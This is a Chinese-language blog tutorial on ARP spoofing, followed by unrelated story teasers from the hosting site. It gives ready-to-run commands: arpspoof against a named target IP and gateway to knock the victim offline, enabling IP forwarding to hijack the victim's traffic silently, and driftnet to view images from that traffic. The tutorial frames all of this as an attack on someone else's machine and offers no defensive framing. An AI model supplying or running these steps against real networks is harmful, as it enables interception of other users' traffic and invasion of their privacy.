茴香豆安全 - ARP断网攻击与流量劫持

一、ARP断网攻击

其实断网不是目的,只是在ARP欺骗过程中如果设置不正确会导致目标断网
我们真正要做的是,是通过ARP欺骗来对目标进行流量劫持

  1. 使用的工具是 arpspoof ,如果kali中没有安装,先安装
apt-get install arpspoof
  • 如果提示安装失败,执行下面的命令
apt-get install dsniff ssldump
  1. 使用arpspoof,来攻击目标,前提是你和目标在同一个局域网,可以互相访问,你知道目标的IP地址,怎么扫描局域网中的IP地址这个以后再说
  • 有兴趣的同学可以先看下arpspoof的使用帮助
arpspoof -h
  • 或者跳过,直接执行下面的命令来攻击目标
arpspoof -i eth0 -t 192.168.1.129 192.168.1.1

命令格式:arpspoof -i 网卡 -t 目标ip 局域网的网关
网卡:当前你的kali系统的网卡,可以通过ifconfig或者 ip a 查看,比如eth0,ifconfig命令渐渐被淘汰了
目标IP:192.168.1.129 (请自行替换)
网关:192.168.1.1 (请自行替换)

  • 不出意外,此时目标机已经断网了

二、ARP流量劫持

目标机之所以会断网,我个人理解,是因为目标机发给网关的流量,被我们给截获了。
如果既要保证我们可以截获目标机的流量,同时也不影响他的上网,那么就只要设置转发就可以了

  1. 流量转发,执行下面的命令,
echo 1 > /proc/sys/net/ipv4/ip_forward

echo 是一个输出命令,上面的命令简单解释就是 把1 写入到 /proc/sys/net/ipv4/ 目录下 ip_forward 文件中,其实就是修改配置文件中的值,1转发,0不转发

  • 此时你再执行上面的 arpspoof 就会发现目标机器不断网了,但是他的流量也被我们给劫持了
  1. 查看所劫持流量中的图片
  • 劫持了流量肯定是为了做流量分析而达到一定的目的,这里就不展开说了
  • 这里可以介绍一个工具driftnet,可以查看流量中的图片
  • 执行下面的命令就会弹出一个框,然后显示当前网卡eth0流量中的图片
driftnet -i eth0
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,922评论 6 497
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,591评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 160,546评论 0 350
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,467评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,553评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,580评论 1 293
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,588评论 3 414
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,334评论 0 270
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,780评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,092评论 2 330
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,270评论 1 344
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,925评论 5 338
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,573评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,194评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,437评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,154评论 2 366
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,127评论 2 352